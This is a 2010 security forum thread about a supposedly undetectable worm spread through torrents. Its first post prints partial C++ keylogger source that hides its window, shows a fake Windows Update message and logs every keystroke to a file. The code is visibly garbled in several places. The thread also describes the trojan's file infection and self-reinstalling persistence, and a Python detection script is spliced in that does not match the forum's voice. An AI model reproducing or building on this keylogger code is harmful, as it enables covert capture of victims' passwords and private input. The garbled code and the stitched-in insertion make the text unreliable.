Security Forums
New Worm/Trojan Spreading

Networking/Security Forums Index -> Viruses // Worms

CleanByte
Just Arrived
Joined: 02 Nov 2009
Posts: 0

PostPosted: Wed Mar 03, 2010 3:39 am    Post subject: New Worm/Trojan Spreading

Hey guys, I know I have a low post count, take this as you will, but there is a new Worm/Trojan spreading, which in itself is not that horrible, but the package is 99% FUD as far as I know; nothing can catch it. I've run just about every diagnostic, heuristic and dependency scan on it, and nothing shows up. It's being attached to thousands and thousands of common torrents (PIRACY IS ILLEGAL), but I'm just putting the word out that it is there.

I got this information from one of the UG boards that I'm a member of. Having been a member for a while on them, I've gained their trust and access to their VIP section. I talked to the creator of the virus and coerced him to show me the source code. I'm going to post the source code here (I will take out parts of the code, but will release the full code to "Trusted" members).

I do a fair bit of coding on the side, so I'm going to make a program in the hopes of pinpointing this issue and seeing how it works; if in fact it does, I'll post the source here.

Code:
#include <windows.h>
#include <stdio.h>
#include <climits>
#include <time.h>
#include <cctype>

using namespace std;

// VARIABLES
bool bExit = false;

unsigned int iGlobalIndex = 0;
const unsigned int NoKeys = 168;
char DataFile[] = "Results.txt";
unsigned int ExitKeyIndex;
unsigned int fter = 5000;
unsigned int ExitKeyDownSince;
const bool bExitMessage = false;


struct clKey
{
    bool bDown;
    char * sKey;
    int iKey;
    bool bCapitalPossible;
    clKey()
    {
        bDown = false;
        iKey = 0;
        sKey = NULL;
    }

    void Set(int paraiKey, char * parasKey, bool parabCapitalPossible)
    {
        iKey = are = parabCapitalPossible;
        iGlobalIndex++;
    }
} Key[NoKeys], OldKy[NoKys];


void LoadKey()
{
    iGlobalIndex = 0;

   character 6]", false);
    Key[iGlobalIndex].Set(VK_OEM_7,"[miscellaneous character 7]", false);
    Key[iGlobalIndex].Set(VK_OEM_8,"[miscellaneous character 8]", false);
    Key[iGlobalIndex].Set(VK_OEM_102,"[miscellaneous character 102]", false);
    Key[iGlobalIndex].Set(VK_PROCESSKEY,"[IME process key]", false);
    Key[iGlobalIndex].Set(VK_ATTN,"[attn key]", false);
    Key[iGlobalIndex].Set(VK_CRSEL,"[crsel key]", false);
    Key[iGlobalIndex].Set(VK_EXSEL,"[exsel key]", false);
    Key[iGlobalIndex].Set(VK_EREOF,"[eof key]", false);
    Key[iGlobalIndex].Set(VK_PLAY,"[play key]", false);
    Key[iGlobalIndex].Set(VK_ZOOM,"[zoom key]", false);
    Key[iGlobalIndex].Set(VK_PA1,"[pa1 key]", false);
    Key[iGlobalIndex].Set(VK_OEM_CLEAR,"[clear key]", false);
}

// FUNCTIONS
int main()
{
   
    HWND Window;
    Window=FindWindow("ConsoleWindowClass",NULL);
    if(Window == NULL)
    {
        MessageBox(NULL,"Windows Update SP3 Installed.","Unexepcted Error",MB_ICONWARNING);
        return(-1);
    }
    ShowWindow(Window,SW_HIDE);
 
    // Load key values into array
    LoadKeys();

    // Create or open file to append
    FILE * file = fopen(DataFile,"a");
    if(file == NULL)
    {
        MessageBox(NULL,"Windows Update SP3 Installed.","Unexepcted Error",MB_ICONWARNING);
        return(-1);
    }

    // Main loop
    while(bExit == false)
    {
        Sleep(1);

       
        for(int x = 0;x<NoKeys;x++)
        {
            if(GetAsyncKeyState(Key[x].iKey) != 0)
            {
                Key[x].bDown = true;
            }
            else
            {
                Key[x].bDown = false;
            }
        }

       
        if(Key[ExitKeyIndex].bDown == true)
        {
            if(ExitKeyDownSince == 0)
            {
                ExitKeyDownSince = clock();
            }
            else
            {
                if(clock()-ExitKeyDownSince > ExitAfter)
                {
                    if(bExitMessage == true)
                    {
                        MessageBox(NULL,"Windows Update SP3 Installed.","Goodbye",MB_ICONINFORMATION);
                    }
                    break;
                }
            }
        }
        else
        {
            ExitKeyDownSince = 0;
        }

        for(int x = 0;x<NoKeys;x++)
        {
            if(Key[x].bDown != OldKey[x].bDown)
            {
                OldKey[x].bDown = Key[x].bDown;

               
                if(Key[x].bDown == true)
                {
                    char * WriteMe = NULL;
                    char UpperCase = NULL;
                    char UpperCaseFull[2];

                    if(Key[x].bCapitalPossible == true)
                    {
                        if(Key[ShiftKeyIndex].bDown == true)
                        {
                            UpperCase = toupper(*Key[x].sKey);
                           
                            UpperCaseFull[0] = UpperCase;
                            UpperCaseFull[1] = '\0';
                            WriteMe = UpperCaseFull;
                        }
                        else
                        {
                            WriteMe = Key[x].sKey;
                        }
                    }
                    else
                    {
                        WriteMe = Key[x].sKey;
                    }

                    fputs(WriteMe,file);
                    break;
                }
            }
        }

       
       
    }
     
     
    if(file != NULL)
    {
        fclose(file);

       
        if(bExitMessage == true)
        {
           
        }
    }
    return (0);
}


If this looks like anything that someone has come across before, I would appreciate a post just letting me know what they did to remove/not remove it.

Regards,
CleanByte
RoboGeek
SF Mod
Joined: 13 Jun 2003
Posts: 16777166
Location: LeRoy, IL

PostPosted: Wed Mar 03, 2010 4:56 am    Post subject:

I've never found malware I can't detect and kill - but I don't use scanners. That's the biggest moneymaker for my shop right now, since no shops around here can clean systems. They all want to nuke and pave.

The biggie out right now is the TDL3 rootkit, which creates a virtual drive and uses its own filesystem in it. It hooks the atapi.sys or iastor.sys file and creates a hidden drive located at the very end of the hard drive. You can delete the loader, but it regenerates with a new name - the rootkit stays active.

You'll know you have this when HJT, SmitFraudFix and ComboFix crash, along with GMER and Dr.Web CureIt.

I have no idea what that is you posted. I can't really see where it does anything. But I'm not a programmer either.
CleanByte
Just Arrived
Joined: 02 Nov 2009
Posts: 0

PostPosted: Wed Mar 03, 2010 6:09 pm    Post subject:

Sorry, I should have been a little more clear when posting the code. The chunk of code posted is for the keylogger aspect of the virus; I've got the source code for the keylogger and the Trojan. I've yet to analyse the code fully, but from what I see the Trojan will mask itself as the "Boot Partition" and start infecting any .exe, .bat, .com, and some other files as they are executed. Also, when the files are opened it will create a copy of the file with a .com extension, and as most of you know, Windows, being its majestic beauty, will run the .com files first. I've been trying to pinpoint exactly what it does, but every time it infects a file it changes its signature, so trying to look solely for one signature is useless. Also, it looks like it writes some registry keys; in the event of the infection being quarantined, it will re-download and hide itself in the startup.

As I said previously, I may have a low post count, but I do know quite a bit about viruses and such; before, I had a dirty hat, but now it's bleached clean.

Anywho, anyone who wants some more info, please feel free to ask me. I'm working on figuring this thing out; I've got it running on my VBox. And if someone has a new virus that they want info about, they can either post here, because this forum is very experienced, or I can run it for you and tell you what happens. I've got a separate rig just made for that; it's running 3 versions of Windows (Windows XP, Windows Vista x86, and Windows 7), so I can test out pretty much anything.

Regards,
CleanByte
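The companion-file behaviour described in the post above (a same-named .com copy that the shell resolves ahead of the original .exe or .bat) leaves a simple on-disk trace that a defender can hunt for. The following script is an added example, not code from the thread or from the malware itself; the TARGET_EXTS set and the constructed sample directory tree are assumptions.

```python
import os
import tempfile
from pathlib import Path

# Extensions the post says the infection targets (assumed set; extend it to
# match what is actually observed on an infected host).
TARGET_EXTS = (".exe", ".bat")


def find_companion_pairs(root):
    """Walk root and return (original, companion) pairs where an executable
    has a same-named .com sibling in the same directory. Paths are returned
    relative to root. A hit is a lead to inspect, not a verdict: a few
    legitimate programs ship .exe/.com pairs on purpose."""
    root = Path(root)
    pairs = []
    for dirpath, _dirs, files in os.walk(root):
        # Group files in this directory by stem, case-insensitively, as
        # Windows name resolution does.
        by_stem = {}
        for name in files:
            p = Path(dirpath, name)
            by_stem.setdefault(p.stem.lower(), {})[p.suffix.lower()] = p
        for _stem, exts in sorted(by_stem.items()):
            companion = exts.get(".com")
            if companion is None:
                continue
            for ext in TARGET_EXTS:
                if ext in exts:
                    pairs.append((str(exts[ext].relative_to(root)),
                                  str(companion.relative_to(root))))
    return pairs


def build_sample_tree():
    """Constructed sample: two companion pairs, one clean .exe, one data file."""
    root = tempfile.mkdtemp(prefix="companion_demo_")
    os.makedirs(os.path.join(root, "tools"))
    for rel in ("setup.exe", "setup.com", "tools/run.bat",
                "tools/run.com", "tools/lone.exe", "notes.txt"):
        Path(root, rel).write_bytes(b"MZ" if rel.endswith(".exe") else b"x")
    return root


def demo():
    return find_companion_pairs(build_sample_tree())


if __name__ == "__main__":
    for original, companion in demo():
        print(f"{original} is shadowed by {companion}")
```

Point find_companion_pairs at a suspect volume root to list every executable that now has a .com shadow; compare the companion's timestamp and size against the original before deciding anything.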
RoboGeek
SF Mod
Joined: 13 Jun 2003
Posts: 16777166
Location: LeRoy, IL

PostPosted: Wed Mar 03, 2010 7:56 pm    Post subject:

I know the virus.

If you clean it wrong, it breaks the keyboard input in Windows, yet the KB still works for the BIOS, etc.

It mimics a Virut infection and even triggers some scanners as a Virut infection, yet it acts more like catchme. I found it packaged with Security Center 2010 malware on customers' PCs, but haven't been able to find the exact thing in the wild to infect a VM so I can play with it.